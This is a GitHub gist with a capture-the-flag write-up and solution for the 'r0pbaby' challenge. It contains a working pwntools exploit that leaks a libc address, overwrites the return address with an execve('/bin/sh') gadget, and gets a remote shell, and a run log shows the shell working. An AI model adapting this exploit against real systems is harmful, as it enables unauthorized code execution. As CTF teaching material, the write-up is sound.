r0pbaby will give you:
1) dlopen handle for libc
2) address of a libc function (your choice)
3) overwrite stack
4) exit
Just overwrite the return address with the magic gadget.
.text:000000000004652C 48 8B 05 75 79 37 00 mov rax, cs:environ_ptr_0
.text:0000000000046533 48 8D 3D A1 67 13 00 lea rdi, aBinSh ; "/bin/sh"
.text:000000000004653A 48 8D 74 24 30 lea rsi, [rsp+30h]
.text:000000000004653F C7 05 77 A1 37 00 00 00 00 00 mov cs:dword_3C06C0, 0
.text:0000000000046549 C7 05 7D A1 37 00 00 00 00 00 mov cs:dword_3C06D0, 0
.text:0000000000046553 48 8B 10 mov rdx, [rax]
.text:0000000000046556 E8 D5 AD 07 00 call execve
-
-
Save zachriggle/ca24daf4e8be953a3f96 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| context.arch='amd64' | |
| # p = process('./r0pbaby_542ee6516410709a1421141501f03760') | |
| p = remote('r0pbaby_542ee6516410709a1421141501f03760.quals.shallweplayaga.me', 10436) | |
| # Game box used libc from Ubuntu 14.04 latest, so this just works | |
| libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') | |
| # Find libc base from a known function address. | |
| # Choice of 'system' is irrelevant. | |
| p.sendline('2') | |
| p.sendline('system') | |
| p.recvuntil('Symbol system: ') | |
| # Calculate libc from function address | |
| system = int(p.recvline(), 0) | |
| libc.address = system - libc.symbols['system'] | |
| log.info('libc: %#x' % libc.address) | |
| """ | |
| .text:000000000004652C 48 8B 05 75 79 37 00 mov rax, cs:environ_ptr_0 | |
| .text:0000000000046533 48 8D 3D A1 67 13 00 lea rdi, aBinSh ; "/bin/sh" | |
| .text:000000000004653A 48 8D 74 24 30 lea rsi, [rsp+30h] | |
| .text:000000000004653F C7 05 77 A1 37 00 00 00 00 00 mov cs:dword_3C06C0, 0 | |
| .text:0000000000046549 C7 05 7D A1 37 00 00 00 00 00 mov cs:dword_3C06D0, 0 | |
| .text:0000000000046553 48 8B 10 mov rdx, [rax] | |
| .text:0000000000046556 E8 D5 AD 07 00 call execve | |
| """ | |
| magic = libc.address + 0x4652C | |
| # Send ROP buffer | |
| p.sendline('3') | |
| p.sendline('1024') | |
| buf = pack(0) + pack(magic) | |
| buf = buf.ljust(1024, '\x00') | |
| p.send(buf) | |
| # Quit, trigger ROP | |
| p.sendline('4') | |
| p.clean() | |
| # Have a shell | |
| p.interactive() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ echo id | python baby.py | |
| [+] Opening connection to r0pbaby_542ee6516410709a1421141501f03760.quals.shallweplayaga.me on port 10436: Done | |
| [*] '/lib/x86_64-linux-gnu/libc.so.6' | |
| Arch: amd64-64-little | |
| RELRO: Partial RELRO | |
| Stack: Canary found | |
| NX: NX enabled | |
| PIE: PIE enabled | |
| [*] libc: 0x7f5ba0a7d000 | |
| [*] Switching to interactive mode | |
| $ id | |
| $ | |
| uid=1001(r0pbaby) gid=1001(r0pbaby) groups=1001(r0pbaby) | |
| [*] Closed connection to r0pbaby_542ee6516410709a1421141501f03760.quals.shallweplayaga.me port 10436 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment